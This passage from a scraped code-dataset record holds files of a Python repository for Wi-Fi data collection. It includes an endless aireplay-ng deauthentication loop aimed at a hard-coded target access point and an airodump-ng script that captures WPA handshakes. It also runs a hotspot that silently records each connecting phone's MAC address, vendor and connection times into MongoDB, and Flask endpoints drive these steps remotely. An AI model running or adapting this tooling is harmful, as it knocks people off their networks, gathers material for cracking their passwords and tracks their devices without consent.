mongo.\".format(datetime.datetime.now()))\n self.collectwifilist(text)\n return\n\n"
},
{
"alpha_fraction": 0.6185935735702515,
"alphanum_fraction": 0.6221692562103271,
"avg_line_length": 34,
"blob_id": "d0a8688d7524b0819570b1981e15f8d5e3d54bed",
"content_id": "a681efca20643ecc065128ee8aa78cd4664b5e42",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 839,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 24,
"path": "/pubfunc/mongoquery.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "import pymongo\nimport datetime\n\n\nclass MONGO:\n def __init__(self, host, port):\n self.host = host\n self.port = port\n\n def getquerydate(self, aircarfNo):\n client = pymongo.MongoClient(host=self.host, port=self.port)\n db = client.swmdb\n eagleyedates = db.runtest\n cursor = eagleyedates.find({\"Info.fno\": aircarfNo}, {\"Info.Date\": 1}).sort(\"Info.Date\", -1).limit(1)\n for el in cursor:\n havedate = datetime.datetime.strptime(el[\"Info\"]['Date'], \"%Y-%m-%dT%H:%M:%S\").date()\n return havedate\n\n def insertintomongo(self, flightdata):\n client = pymongo.MongoClient(host=self.host, port=self.port)\n db = client.swmdb\n eagleyedates = db.runtest\n eagleyedates.insert(flightdata)\n print(datetime.datetime.now(), 'insert mongodb success')"
},
{
"alpha_fraction": 0.8547008633613586,
"alphanum_fraction": 0.8632478713989258,
"avg_line_length": 28.5,
"blob_id": "d4bbd250d51780308c1e720e1135c2b30888c7dc",
"content_id": "8e0dec7eeaac1888e48c45fceeb71661d1efd075",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 117,
"license_type": "permissive",
"max_line_length": 37,
"num_lines": 4,
"path": "/terminal/__init__.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\nfrom terminal import getterminalfield\nfrom terminal import allconfig\nfrom terminal import mongooptions"
},
{
"alpha_fraction": 0.6159209609031677,
"alphanum_fraction": 0.6327716708183289,
"avg_line_length": 21.363636016845703,
"blob_id": "4900c55c6e669d6831fd85cb2f222bebc1090aa9",
"content_id": "0f8a94705887ba3a43c09d74b20d6e23ad46be2b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1861,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 77,
"path": "/pubfunc/pubfuce.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\n公用方法:\n不同时间格式转换\n去重等方法\ncreat by swm\n20180108\n\"\"\"\nimport datetime\nimport os\n# 当前文件夹的绝对路径\nfileDir = os.path.dirname(os.path.realpath(__file__))\nprint(fileDir)\n\n\nclass Student(object):\n\n @property\n def score(self):\n return self._score\n\n @score.setter\n def score(self, value):\n if not isinstance(value, int):\n raise ValueError(\"score must be an integer!\")\n if value < 0 or value > 100:\n raise ValueError(\"score must between 0~100\")\n self._score = value\n\ndef getallthefilename(directorypath):\n allfilenames = []\n for root, dirs, files in os.walk(directorypath):\n for filename in files:\n # print(filename)\n allfilenames.append(filename)\n # 修改文件名\n # os.rename(filename, newfilename)\n return allfilenames\n\n\n# 测试定时任务\ndef aspdo():\n print(\"i have a schedule\", datetime.datetime.now())\n\n\n# unixtime to 北京时间\ndef unixtimeToBjTime(nowUnixtime):\n bjtime = datetime.datetime.fromtimestamp(nowUnixtime)\n # 时间相加(例子为加10分钟)\n getonthncartime = bjtime + datetime.timedelta(minutes=10)\n return bjtime\n\n\n# 获取列表中一个元素重复的次数和位置\ndef getAllIndices(element, alist):\n \"\"\"\n Find the index of an element in a list. The element can appear multiple times.\n input: alist - a list\n element - objective element\n output: index of the element in the list\n \"\"\"\n result = []\n offset = -1\n while True:\n try:\n offset = alist.index(element, offset + 1)\n except ValueError:\n return result\n result.append(offset)\n\n\nif __name__ == '__main__':\n s = Student()\n s.score = 30\n print s.score\n s.score = 9000\n # print(getallthefilename(fileDir))"
},
{
"alpha_fraction": 0.5798165202140808,
"alphanum_fraction": 0.5981651544570923,
"avg_line_length": 22.191490173339844,
"blob_id": "705107b62cb2015440856dc583d958ad5aa85ffc",
"content_id": "a6563576fa980aac7f7b313c2ff7a2b90a44385f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1168,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 47,
"path": "/pubfunc/getwifiinfo.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\n\"\"\"\n获取wifi信息并写入文件\ncreate by swm 2018/1/25\n\"\"\"\n\nfrom subprocess import call\nimport datetime\nimport time\n\n\nclass INFO:\n\n def __init__(self):\n self.shellpath = \"/home/getallwifi.sh\"\n self.logpath = \"/home/wifi.log\"\n\n def startshell(self):\n # 执行脚本前先清理下log文件\n call(\"rm -rf {}\".format(self.logpath), shell=True)\n print \"start the shell\"\n # 执行脚本\n call(self.shellpath, shell=True)\n\n # kill shell\n def killshell(self):\n call(\"ps -ef|grep airodump-ng|grep -v grep|cut -c 9-15|xargs kill -s 9\", shell=True)\n\n # 结束循环后kill自己,并且删除log文件\n def killmyself(self):\n call(\"ps -ef|grep getwifiinfo.py|grep -v grep|cut -c 9-15|xargs kill -s 9\", shell=True)\n\n def strat(self):\n self.startshell()\n print datetime.datetime.now(), \"Start scan the wifi, wait 10s\"\n time.sleep(10)\n # 结束shell\n self.killshell()\n print datetime.datetime.now(), \"Have writen log to file\"\n self.killmyself()\n\n\nif __name__ == '__main__':\n print \" start\"\n info = INFO()\n info.strat()\n"
},
{
"alpha_fraction": 0.5987654328346252,
"alphanum_fraction": 0.6296296119689941,
"avg_line_length": 18,
"blob_id": "442017d4009940652acf3b9e89c8e64036e9d036",
"content_id": "cfeb1904a3e566ff58ba698a087cf3831693eef5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 346,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 17,
"path": "/wifilist/wifiswitch.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\n\"\"\"\n选择网卡, 更改shell脚本内容\ncreate by swm\n2018/03/12\n\"\"\"\nfrom subprocess import call\n\n\nclass SWITCH:\n\n def stopwifi(self, wlanname):\n call('airmon-ng stop {}mon'.format(wlanname), shell=True)\n call('ifconfig {} down'.format(wlanname), shell=True)\n info = {\"stoped\": 1}\n return info\n\n"
},
{
"alpha_fraction": 0.5483871102333069,
"alphanum_fraction": 0.5652605295181274,
"avg_line_length": 29.530303955078125,
"blob_id": "0d2cd971b3bcbf8922eca2c9b2ffe8ade7c4b168",
"content_id": "d9f2f8488072fc87cb03090991a37415957eaf4b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2221,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 66,
"path": "/attack/routeattack.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\n根据获得的wifi信息不断攻击目标wifi\ncreate by swm\n2018/03/23\n\"\"\"\nfrom subprocess import call, Popen, PIPE\nimport time\nimport redis\nimport re\n\nclass ATTACK:\n\n def __init__(self, mac, wlanname, ch):\n self.mac = mac\n self.wlanname = wlanname\n self.ch = ch\n\n # 选择wifi,并开启wlanmon,准备开始路由攻击\n def startwlanmon(self):\n call('ifconfig {} up'.format(self.wlanname), shell=True)\n call('airmon-ng check kill', shell=True)\n call('airmon-ng start {}'.format(self.wlanname), shell=True)\n return\n\n def changechannel(self, wlanname, ch):\n iwcmd = 'iwconfig {}mon channel {}'.format(wlanname, ch)\n call(iwcmd, shell=True)\n return\n\n def startattack(self):\n r = redis.Redis(host=\"localhost\", port=6379)\n r.hset('attack', 'statu', 1)\n attack = r.hget('attack', 'statu')\n # 在程序执行之前先改变虚拟网卡的信道\n self.changechannel(self.wlanname, self.ch)\n re_success = re.compile(r'Sending DeAuth to broadcast \\-\\- BSSID\\: \\[{}\\]'.format(self.mac))\n re_newch = re.compile(r'AP\\Wuses\\Wchannel\\W(\\d)')\n while int(attack) == 1:\n cmd = 'aireplay-ng -0 10 -a {} {}mon'.format(self.mac, self.wlanname)\n p = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True)\n out, err = p.communicate()\n # 每次都去匹配成功的字段\n success = re_success.search(out)\n if success:\n # 如果成功的化就不用理会继续执行攻击\n time.sleep(0.2)\n else:\n # 如果失败就获取当前频率并改变网卡的频率\n newch = re_newch.findall(out)\n self.changechannel(self.wlanname, newch[0])\n attack = r.hget('attack', 'statu')\n else:\n call('airmon-ng stop {}mon'.format(self.wlanname), shell=True)\n\n def start(self):\n # 1、开启airmongo\n # 2、开始进行路由攻击\n self.startwlanmon()\n self.startattack()\n return\n\n\nif __name__ == '__main__':\n attack = ATTACK('50:2B:73:F4:35:F1', 'wlan1', '3')\n attack.start()\n"
},
{
"alpha_fraction": 0.5780661106109619,
"alphanum_fraction": 0.5918794274330139,
"avg_line_length": 28.862499237060547,
"blob_id": "8a3dbaac5a1e49c995ff95162def68e455779a13",
"content_id": "8355cfc711331ac5859f8a5f8e25120a3315cb6f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2485,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 80,
"path": "/terminal/switch.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\n\"\"\"\n控制手机信息搜集的开关\ncreate by swm\n2018/03/06\n\"\"\"\nfrom subprocess import Popen, call\nfrom time import sleep\nimport threading\n\nfrom terminal.allconfig import conf\n\n\n\nclass WEBSWITCH:\n\n def __init__(self):\n self.hostapdshell = conf['hostapdshell']\n self.dhcpshell = conf['dhcpshell']\n self.routershell = conf['routershell']\n self.hostapdlog = conf['hostapdlog']\n self.dhcplog = conf['dhcplog']\n\n def starthostadp(self):\n fdout = open(self.hostapdlog, 'a')\n fderr = open(self.hostapdlog, 'a')\n # 修改为不写入文件对于不是很大的字符串直接存储在内存\n p = Popen(self.hostapdshell, stderr=fderr, stdout=fdout, shell=True)\n if p.poll():\n return\n return\n\n def startdhcp(self):\n fdout = open(self.dhcplog, 'a')\n fderr = open(self.dhcplog, 'a')\n p = Popen(self.dhcpshell, stderr=fderr, stdout=fdout, shell=True)\n if p.poll():\n return\n return\n\n def startrouter(self):\n p = Popen(self.routershell, shell=True)\n return\n\n def startallshell(self):\n # 开启与WiFi热点相关的所有数据\n # thread1 = threading.Thread(target=self.starthostadp)\n self.starthostadp()\n sleep(1)\n # thread2 = threading.Thread(target=self.startdhcp)\n self.startdhcp()\n sleep(1)\n # thread3 = threading.Thread(target=self.startrouter)\n self.startrouter()\n # mobi = HOSTAPD()\n # thread4 = threading.Thread(target=mobi.startcollect)\n # # mobi.startcollect()\n # thread1.start()\n # sleep(1)\n # thread2.start()\n # sleep(1)\n # thread3.start()\n # thread4.start()\n # thread1.join()\n # thread2.join()\n # thread3.join()\n # thread4.join()\n return\n\n def shutdowntheshell(self, wlanname):\n call(\"ps -ef|grep hostapd|grep -v grep|cut -c 9-15|xargs kill -s 9\", shell=True)\n call(\"ps -ef|grep dhcp|grep -v grep|cut -c 9-15|xargs kill -s 9\", shell=True)\n Popen('ifconfig {} down'.format(wlanname), shell=True)\n Popen('rm -rf {}'.format(self.hostapdlog), shell=True)\n Popen('touch {}'.format(self.hostapdlog), shell=True)\n Popen('rm -rf {}'.format(self.dhcplog), shell=True)\n Popen('touch {}'.format(self.dhcplog), shell=True)\n # call(\"ifconfig {} down\".format(wlanname), shell=True)\n return\n"
},
{
"alpha_fraction": 0.5198863744735718,
"alphanum_fraction": 0.5497159361839294,
"avg_line_length": 23.719297409057617,
"blob_id": "4b890075de1ed7412d0d13946c253ce00264c582",
"content_id": "2e56982fd95e85889bb1ffb48d596baa629f3fae",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1462,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 57,
"path": "/startcollection.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\nimport threading\nimport datetime\nimport time\nfrom terminal.gethostapdfield import HOSTAPD\nclass T1:\n def thread2(self):\n count = 0\n while True:\n count += 1\n print 'swm'\n if count == 10:\n break\n return 'hello'\nclass T2:\n def thread1(self):\n count = 0\n while True:\n print 'nuonuo'\n count +=1\n if count ==20:\n break\n return 'swm'\ndef start():\n t1 = T1()\n t2 = T2()\n for i in range(0, 3):\n print datetime.datetime.now(), i\n thread1 = threading.ThreadW(target=t1.thread2)\n thread2 = threading.Thread(target=t2.thread1)\n thread1.setDaemon(1)\n thread2.setDaemon(1)\n a = thread1.start()\n b = thread2.start()\n thread2.join()\n thread1.join()\n print a\n print b\n print threading.activeCount()\n print datetime.datetime.now(), 'stop the program'\n return\nif __name__ == '__main__':\n # python多任务\n # mobi = HOSTAPD()\n # 采集手机信息的一个线程\n # thread1 = threading.Thread(target=mobi.startcollect)\n # 采集网络信息的线程\n # thread2 = threading.Thread(target=t2.start)\n # 开启线程\n # thread1.start()\n # thread1.start()\n # thread2.start()\n # thread1.join()\n # thread2.join()\n # time.sleep(5)\n print datetime.datetime.now(), 'start collect'\n start()"
},
{
"alpha_fraction": 0.5609756112098694,
"alphanum_fraction": 0.5818815231323242,
"avg_line_length": 13.350000381469727,
"blob_id": "43b33c91b44374d41c9f1622f03355460eed5c84",
"content_id": "1a0a4e8a751676b1d9399f2c9b93fa121436321d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 321,
"license_type": "permissive",
"max_line_length": 52,
"num_lines": 20,
"path": "/attack/stopattack.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\n\"\"\"\n结束死循环式的攻击\n反正就是结束攻击\n\"\"\"\nimport redis\n\n\nclass SHUTDOWN:\n\n def attackover(self):\n r = redis.Redis(host=\"localhost\", port=6379)\n r.hset('attack', 'statu', 0)\n return\n\n\nif __name__ == '__main__':\n shuwdown = SHUTDOWN()\n shuwdown.attackover()\n"
},
{
"alpha_fraction": 0.5423728823661804,
"alphanum_fraction": 0.6271186470985413,
"avg_line_length": 19,
"blob_id": "18a11b84746ee382242447c744131af88a27f085",
"content_id": "0617f6b1e361bae8dd066720bf2980599ea39101",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 59,
"license_type": "permissive",
"max_line_length": 27,
"num_lines": 3,
"path": "/pubfunc/config.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "mongo ={}\nmongo['host'] = \"localhost\"\nmongo['port'] = 27017"
},
{
"alpha_fraction": 0.579812228679657,
"alphanum_fraction": 0.6126760840415955,
"avg_line_length": 26.45161247253418,
"blob_id": "ce3c682c60b6b8191995760c6fed56ad02b79030",
"content_id": "9c15af114880578456e2214fc09a1ee25751af07",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 852,
"license_type": "permissive",
"max_line_length": 101,
"num_lines": 31,
"path": "/pubfunc/selectmingidata.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\ncreate by swm\n2018/02/26\n\"\"\"\nimport pymongo\nimport datetime\nimport time\nimport json\n\n\ndef getquerydate(today):\n res = []\n client = pymongo.MongoClient(host=\"192.168.1.213\", port=27017)\n db = client.swmdb\n collection = db.wifilist\n # cursor = collection.find({\"unixtime\": {\"$gt\": int(today)}}, {\"_id\": 0}).sort({\"unixtime\": -1})\n cursor = collection.find({\"unixtime\": {\"$gt\": int(today)}}, {\"_id\": 0}).sort([(\"unixtime\", -1)])\n for el in cursor:\n havedate = datetime.datetime.fromtimestamp(int(el['unixtime'])).strftime('%Y-%m-%d %H:%M:%S')\n el['unixtime'] = havedate\n res.append(el)\n return res\n\n\nif __name__ == '__main__':\n todayunxi = time.mktime(datetime.date.today().timetuple())\n res = getquerydate(todayunxi)\n # print res\n jsondata = json.dumps(res)\n print jsondata\n\n"
},
{
"alpha_fraction": 0.8666666746139526,
"alphanum_fraction": 0.8666666746139526,
"avg_line_length": 14,
"blob_id": "10b81efc970d90bdd391a3ab6fa7236810420aef",
"content_id": "bd4cce4f2480d735b83eae21c759eef4a0a52364",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 40,
"license_type": "permissive",
"max_line_length": 18,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# linuxdatacollect\n搜集linux的信息\n"
},
{
"alpha_fraction": 0.7053571343421936,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 12.875,
"blob_id": "db451f403d3156fbc1292df10297c71a23203073",
"content_id": "29dbeda087d94e57cb1f764942e16d95f5a624d1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 120,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 8,
"path": "/pubfunc/decorator.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n# 函数注册\nregistry = []\n\n\ndef register(decorated):\n registry.append(decorated)\n return decorated\n\n"
},
{
"alpha_fraction": 0.5992043614387512,
"alphanum_fraction": 0.6051715612411499,
"avg_line_length": 30.4375,
"blob_id": "cc8bb4dda921d56c0a77d97993c7af6751e119a2",
"content_id": "84d6ff9c1f547dee2f4ffc077c4fba8c0acd3ba7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2245,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 64,
"path": "/wifilist/getwifihandshake.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\nimport os\nimport subprocess\nimport redis\nimport re\n\"\"\"\n根据传入的mac,ch,wifi名去获取\nwifi handshake的握手包\ncreate by swm 2018/1/26\n\"\"\"\n\n\nfiledir = os.path.dirname(os.path.realpath(__file__))\n\n\nclass HANDSHAKE:\n\n def __init__(self, mac, ch, wifi, wlanname):\n # self.hslogpath = os.path.join(filedir, 'routrattack', 'wifihandshake.log')\n # self.logpath = \"/home/execute.log\"\n self.savedatapath = '/home/wifidata/'\n self.mac = mac\n self.ch = ch\n self.wifi = wifi\n self.wlanname = wlanname\n # 获得文件的路径\n self.wifihandshake = '/home/wifidata/{}-01.cap'.format(wifi)\n # 保存文件的路径\n self.keepfile = '/home/wifihandshakedata/'\n from terminal.allconfig import conf\n self.r = redis.Redis(host=conf['redishost'], port=conf['redisport'])\n\n # 保存shell的所有输出\n def writeinfotolog(self, cmd):\n p = subprocess.Popen(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n return err\n\n def delunusefile(self):\n subprocess.call(\"rm -f /home/wifidata/*\", shell=True)\n\n # 移动获取成功的文件\n def mvfile(self):\n subprocess.call(\"cp -frap {} {}\".format(self.wifihandshake, self.keepfile), shell=True)\n\n # 接收mac,ch, wifi获取wifihandshakebao,这个程序就只会写log知道泛洪攻击成功\n def starthandshake(self):\n # 在获取握手包前先删除以前的握手包\n self.delunusefile()\n # 开启获取wifi握手包的命令,并将log写入文件,本地获得一个文件\n cmd = 'airodump-ng -c {} --bssid {} -w {} {}mon'.format(self.ch, self.mac, self.savedatapath + self.wifi, self.wlanname)\n strdata = self.writeinfotolog(cmd)\n re_handshake = re.compile(r'WPA handshake\\:.{}'.format(self.mac))\n for line in strdata.splitlines():\n handshake = re_handshake.search(line)\n if handshake:\n GET = 1\n # 获取握手包成功后删除wifilog\n break\n else:\n GET = 0\n continue\n self.r.hset(\"handshake\", \"GET\", GET)\n return"
},
{
"alpha_fraction": 0.6370118856430054,
"alphanum_fraction": 0.6465195417404175,
"avg_line_length": 31.373626708984375,
"blob_id": "d0d38e24c9fa797c42920cab6c264e5291341378",
"content_id": "2b117f7edea47d649fee6b3bee2621407e59db99",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2969,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 91,
"path": "/locapp.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\nimport threading\nfrom flask import Flask, request, Response, send_from_directory, make_response, render_template\nimport json\nimport gevent.monkey\nfrom gevent.pywsgi import WSGIServer\nimport redis\nfrom flask.ext.cors import CORS\ngevent.monkey.patch_all()\n# 内部引用\nfrom wifilist.mongoquery import getquerydate\nfrom wifilist.getwifihandshake import HANDSHAKE\nfrom wifilist.routeattack import ROUTE\napp = Flask(__name__)\nCORS(app)\n\n\[email protected]('/')\ndef root():\n return render_template('swmfile.html')\n\n\[email protected]('/api/mongodata', methods=['get'])\ndef sendmongodata():\n responsedata = getquerydate()\n return Response(responsedata, mimetype=\"application/json\")\n\n\[email protected]('/api/startcollect', methods=['post'])\ndef starttheserver():\n args = json.loads(request.data)\n # 类型强转确保int\n seconds = int(args['seconds'])\n if int(args['start']) == 1:\n # control = CONTROL(seconds)\n # thread1 = threading.Thread(target=control.start)\n # thread2 = threading.Thread(target=control.killshell)\n # thread1.start()\n # thread2.start()\n # thread1.join()\n # thread2.join()\n info = {\"complete\": 1}\n else:\n info = {\"complete\": 0, \"error\": \"something wrong with you!\"}\n response = Response(json.dumps(info), mimetype=\"application/json\")\n return response\n\n\[email protected]('/api/handshake', methods=['post'])\ndef collecthandshake():\n args = json.loads(request.data)\n open(args['wifi'], \"w+\").close()\n # handshake = HANDSHAKE(args['mac'], int(args['ch']), args['wifi'])\n # router = ROUTE(args['mac'])\n # t1 = threading.Thread(target=handshake.starthandshake)\n # t2 = threading.Thread(target=router.start)\n # t1.start()\n # t2.start()\n # t2.join()\n # t1.join()\n # from terminal.allconfig import conf\n # r = redis.Redis(host=conf['redishost'], port=conf['redisport'])\n # get = r.hget(\"handshake\", \"GET\")\n if args is not None:\n info = {\"complete\": 1}\n else:\n info = {\"complete\": 0, \"error\": \"Failed get wifi handshake\"}\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\[email protected]('/api/download/<wifi>', methods=['GET'])\ndef download(wifi):\n filepath = './'\n filename = '{}'.format(wifi)\n # 中文\n response = make_response(send_from_directory(directory=filepath, filename=filename, as_attachment=True))\n # except:\n # info = {\"complete\": 0, \"error\": \"No such file, scan wifi failed\"}\n # return Response(json.dumps(info), mimetype=\"application/json\")\n response.headers[\"Content-Disposition\"] = \"attachment; filename={}\".format(filename.encode().decode('latin-1'))\n return response\n\n\nif __name__ == '__main__':\n http_server = WSGIServer(('0.0.0.0', 8014), app)\n try:\n print(\"Start at \" + http_server.server_host +\n ':' + str(http_server.server_port))\n http_server.serve_forever()\n except(KeyboardInterrupt):\n print('Exit...')"
},
{
"alpha_fraction": 0.5403578281402588,
"alphanum_fraction": 0.547117292881012,
"avg_line_length": 33.93055725097656,
"blob_id": "8bf10b2f1e48384fe1b53311d418e9a9fa02bdc0",
"content_id": "5511774b0fba17d80f3a33e2e92ad1cf6c3c00b9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2629,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 72,
"path": "/terminal/gethostapdfield.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\n读取hostapd的log,并且将结果缓存在redis\ncreate by swm\n2018/01/16\n\"\"\"\nimport time\nimport re\nimport redis\n\nfrom terminal.allconfig import conf\nfrom terminal import mongooptions as mongo\n\n\nclass HOSTAPD:\n\n def __init__(self):\n self.r = redis.Redis(host=conf['redishost'], port=conf['redisport'])\n\n def follw(self, thefile):\n thefile.seek(0, 2) # Go to the end of the file\n while True:\n line = thefile.readline()\n if not line:\n time.sleep(0.1)\n continue\n yield line\n\n def getmobilfactory(self, devicemac):\n dhcpfile = open(conf['dhcplog'], \"r\").read()\n re_factory = re.compile(r'{}.\\((.*?)\\)'.format(devicemac))\n factory = re_factory.findall(dhcpfile)[0]\n return factory\n\n def getthehostapdname(self):\n hostapdconffile = open(conf['hostapdconf'], \"r\").read()\n re_name = re.compile(r'\\bssid\\=(.+)')\n wifiname = re_name.findall(hostapdconffile)\n return wifiname[0]\n\n def startcollect(self):\n re_connect = re.compile(r'AP-STA-CONNECTED.(\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+)')\n re_disconnect = re.compile(r'AP-STA-DISCONNECTED.(\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+)')\n logfile = open(conf['hostapdlog'], \"r\")\n loglines = self.follw(logfile)\n for line in loglines:\n connect = re_connect.search(line)\n if connect:\n wifiname = self.getthehostapdname()\n name = connect.group(1)\n # 上线时间\n connecttime = int(time.time())\n self.r.hset(name, \"onlinetime\", connecttime)\n self.r.hset(name, \"devicemac\", name)\n self.r.hset(name, \"wifiname\", wifiname)\n continue\n disconnect = re_disconnect.search(line)\n if disconnect:\n name = disconnect.group(1)\n # 根据devicemac在dhcp.log中寻找生产产商\n factory = self.getmobilfactory(name)\n self.r.hset(name, \"factory\", factory)\n disconnecttime = int(time.time())\n # 下线时间\n self.r.hset(name, \"offlinetime\", disconnecttime)\n mobiinfo = self.r.hgetall(name)\n # 上网的时间,单位为s,转换为int相减上\n mobiinfo['nettime'] = int(mobiinfo['offlinetime']) - int(mobiinfo['onlinetime'])\n mongo.insertmoibiinfo(mobiinfo)\n # 删除redis中已经存储在了mongodb的信息\n self.r.delete(name)\n continue\n"
},
{
"alpha_fraction": 0.6197183132171631,
"alphanum_fraction": 0.6287726163864136,
"avg_line_length": 27.68269157409668,
"blob_id": "1131f9bfbb239822e798e41f9834d52ddc3af56f",
"content_id": "c2fbbb979bc2b456107fa73c123a05f696f1ba87",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3032,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 104,
"path": "/wifi.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\nfrom flask import Flask, request, Response\nimport json\nimport gevent.monkey\nfrom gevent.pywsgi import WSGIServer\nimport threading\nfrom time import sleep\ngevent.monkey.patch_all()\n\napp = Flask(__name__)\n\nfrom terminal.switch import WEBSWITCH\nfrom terminal.mongooptions import mobidata\nfrom terminal.getallwifiname import IWWIFI\nfrom terminal.gethostapdfield import HOSTAPD\n\n\[email protected]('/api/allwlan', methods=['get'])\ndef getallwlan():\n iw = IWWIFI()\n info = {}\n wlanlist = iw.getallname()\n if len(wlanlist) == 0:\n info['wlan'] = wlanlist\n info['err'] = 'no wlan find, please check the mechine'\n else:\n info['wlan'] = wlanlist\n # info = {\"wlan\": ['wlan0', 'wlan1', 'wlan2']}\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\[email protected]('/api/whichwlan', methods=['post'])\ndef wlanname():\n args = json.loads(request.data)\n wlan = args['wlanname']\n # 改变wlan名字\n iw = IWWIFI()\n iw.rename(wlan)\n info = {\"changed\": 1}\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\[email protected]('/api/wificonf', methods=['post'])\ndef wificonf():\n args = json.loads(request.data)\n name = args['name']\n pwd = args['pwd']\n # 改变热点名字和密码\n iw = IWWIFI()\n iw.changewificonf(name, pwd)\n info = {\"changed\": 1}\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\[email protected]('/api/start', methods=['post'])\ndef start():\n args = json.loads(request.data)\n startcode = args['start']\n if int(startcode) == 1:\n # 调用开始函数\n # print 'start the mobi info collection'\n switch = WEBSWITCH()\n thread1 = threading.Thread(target=switch.startallshell)\n mobi = HOSTAPD()\n thread2 = threading.Thread(target=mobi.startcollect)\n thread1.start()\n thread2.start()\n # thread1.join()\n # thread2.join()\n info = {\"started\": 1}\n else:\n info = {\"started\": 0, \"erro\": \"something wrong with the data.\"}\n return Response(json.dumps(info), mimetype=\"applicarion/json\")\n\n\[email protected]('/api/shutdown', methods=['post'])\ndef stop():\n args = json.loads(request.data)\n stopcode = args['stop']\n stopwlan = args['wlanname']\n if int(stopcode) == 1:\n # 调用停止函数\n # print \"stop the mobi info collection\"\n switch = WEBSWITCH()\n switch.shutdowntheshell(stopwlan)\n info = {\"stopcode\": 1}\n else:\n info = {\"stopcode\": 0, \"erro\": \"something wrong with the data.\"}\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\[email protected]('/api/mobiinfo', methods=['get'])\ndef querymobidata():\n data = json.dumps(mobidata())\n return Response(data, mimetype=\"application/json\")\n\n\nif __name__ == '__main__':\n http_server = WSGIServer(('0.0.0.0', 8015), app)\n try:\n print(\"Start at\" + http_server.server_host + ':' + str(http_server.server_port))\n http_server.serve_forever()\n except(KeyboardInterrupt):\n print('Exit......')"
},
{
"alpha_fraction": 0.4719010591506958,
"alphanum_fraction": 0.4749012291431427,
"avg_line_length": 43.63105010986328,
